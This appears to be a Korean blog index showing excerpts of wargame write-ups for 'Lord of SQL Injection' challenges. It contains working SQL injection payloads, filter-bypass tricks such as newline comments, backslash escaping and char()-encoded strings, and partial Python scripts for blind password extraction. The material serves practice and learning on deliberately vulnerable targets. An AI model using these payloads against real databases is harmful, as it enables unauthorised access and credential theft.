살아가는 이야기

소스코드를 보면, id='guest'#를 통해 뒤에 부분을 주석처리한다. 하지만 #는 한줄주석처리로 %0a를 만나게 하면 내릴 수 있다. id='%0aor id='admin' limit 1,1 # where id='guest'# and pw=''%0a or id='admin' limit 1,1 #' id가 guest와 admin 두개가 있기 때문에 두번째 인자인 admin에 대해서 출력할려면 limit 1,1 로 설정해 주어야 한다. ?id=id='%0aor id='admin' limit 1,1 %23 입력

자세히 보면 id!='admin'입니다..! 따라서 pw값 뒤에는 모두 주석 처리를 하도록 시도해봅시다. '#', '-- ' 대신에 ;%00를 이용할 수 있습니다. 그래서 처음엔 pw=1')||id='admin';%00를 해서, pw=('1')||id='admin';%00') and id!='admin'" 구문을 생각했으나.. strlen()>6에 의해서 막혀버렸습니다. 다음으로 생각해 낸 것이 바로 pw=('')

1. strrev() 문자열을 입력받아서 순서를 뒤집은 상태로 리턴하는 함수 strrev('123456') --> '654321' 2. 필터링 문자들 prob _ . () 이전 문제를 다시 사용하면 될 거 같다. 이전글 --> https://sh1256.tistory.com/72 [Load of SQL Injection] succubus 1. 필터링 prob _ . () 처음에 \(\)를 \\뜻으로 보고 1시간 넘게 못 풀었던...ㅜㅠ 이런 실수는 하지 맙시다 ㅎ 더보기 where id='\' and pw='or 1#' --> where id='\' and pw='or 1 # ' --> 특수문자 앞에 '\'를.. sh1256.tistory.com 3. strrev()와 addslashes()를 고려해서 ..

1. 필터링 prob _ . () 처음에 \(\)를 \\뜻으로 보고 1시간 넘게 못 풀었던...ㅜㅠ 이런 실수는 하지 맙시다 ㅎ 더보기 where id='\' and pw='or 1#' --> where id='\' and pw='or 1#' --> 특수문자 앞에 '\'를 붙이면 특수문자는 문자로 취급한다. 이 점을 이용해서 공격 시도! select id from prob_succubus where id='\' and pw='or id=char(97,100,109,105,110)#' select id from prob_succubus where id='\' and pw='or id=char(97,100,109,105,110)#' URL + ?id..

문제는 단순하다. shit변수에 공백을 넣을 수 있으면 된다. 1) \n(%0a) -커서를 다음줄로 이동시키는 개행 문자 2)\t(%09) -TAB 3)\r(%0d) -커서를 줄의 맨 앞으로 이동시키는 문자 4) () 괄호 5) /**/ 주석 6) + 더하기 7)%0b, %0c, %a0, %20

?pw=1&&no=1||(length(pw)

-참: URL + ?pw=1&&no=1 or (1 like 1) --> Hello guest 나타남 거짓: URL + ?pw=1&&no=1 or (1 like 2) 길이 알아내기+ pw 알아내기 시도 Hello admin이 나올 때 참!! import requests cookies={'PHPSESSID':'쿠키값'} url ="https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=1&&no=1 or " length=8#hash는 17자리 for i in range(1, 30): length_srch=f"(length(pw) like {i})" print("length_srch: "+length_srch) respons..

-참일 때 ?pw=1'||'1' like '1' %23 -거짓일 때 ?pw=1'||'1' like '2' %23 1. 필터링 우회하기 1. '='(등호)는 like 로 대체가능 2. substr()는 mid()로 대체가능 2. pw 길이 알아내기 ?pw=1'||length(pw) like 8 %23 select id from prob_golem where id='guest' and pw='1'||length(pw) like 8 #' --> Hello admin 출력 --> 참 따라서 pw의 길이는 8 2. pw 알아내기 ?pw=1'||mid(pw, n, 1) like '? --> python 사용 import requests cookies={'PHPSESSID':'쿠키값'} url ="https://lo..

필터링 1. '(홑따음표) 2. 대문자를 소문자로 바꿔주는 strtolower() 함수 3. str_replace()함수 먼저 strtolower()함수의 취약점을 찾아보았다. strtolower()를 사용할 때 %c4%b0을 입력하면 i로 바뀐다고한다. 그래서 adm%c4%b0n을 입력해 줬더니, 이상한 i가 등장...? 안되겠다 싶어서 str_replace함수를 공략했다. str_replace(문자열1, 문자열2, 문자열3) str_replace( 1번째 인수 : 변경대상 문자 2번째 인수 : 변경하려는 문자 3번째 인수 : 변수, replace가 바꾸고자 하는 문자열(변수수) ) ex) result=str_replace("love", "hate", "I love you") result 값은 "I h..

5번째 줄 정규표현식인(정규표현식 설명 --> https://sh1256.tistory.com/59?category=991734) preg_match("/admin/, $_GET[id])) 를 보면, /i가 없다. /i는 대소문자 구별 없이 필터링 할 수 있게 도와주는데, /i가 없으니까, 대소문자 구별 없는 SQL 에서는 admin=ADMIN=AdMiN 으로 받아들이게 된다. 따라서, URL 뒤에 ?id=ADMin 으로 입력하면 통과